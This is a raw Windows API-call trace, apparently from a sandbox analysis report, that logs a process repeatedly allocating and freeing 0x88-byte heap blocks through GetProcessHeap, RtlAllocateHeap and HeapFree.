GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0120.798] GetProcessHeap () returned 0xe30000 [0120.798] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825608 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825608 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.799] GetProcessHeap () returned 0xe30000 [0120.799] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.800] GetProcessHeap () returned 0xe30000 [0120.800] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.800] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.801] GetProcessHeap () returned 0xe30000 [0120.801] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.802] GetProcessHeap () returned 0xe30000 [0120.802] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.802] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.803] GetProcessHeap () returned 0xe30000 [0120.803] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.803] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.804] GetProcessHeap () returned 0xe30000 [0120.804] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.804] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.805] GetProcessHeap () returned 0xe30000 [0120.805] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.806] GetProcessHeap () returned 0xe30000 [0120.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.806] GetProcessHeap () returned 0xe30000 [0120.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.806] GetProcessHeap () returned 0xe30000 [0120.806] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.806] GetProcessHeap () returned 0xe30000 [0120.806] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0120.807] GetProcessHeap () returned 0xe30000 [0120.807] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.807] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0120.808] GetProcessHeap () returned 0xe30000 [0120.808] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0120.808] GetProcessHeap () returned 0xe30000 [0120.809] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0120.809] GetProcessHeap () returned 0xe30000 [0120.809] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0120.809] GetProcessHeap () returned 0xe30000 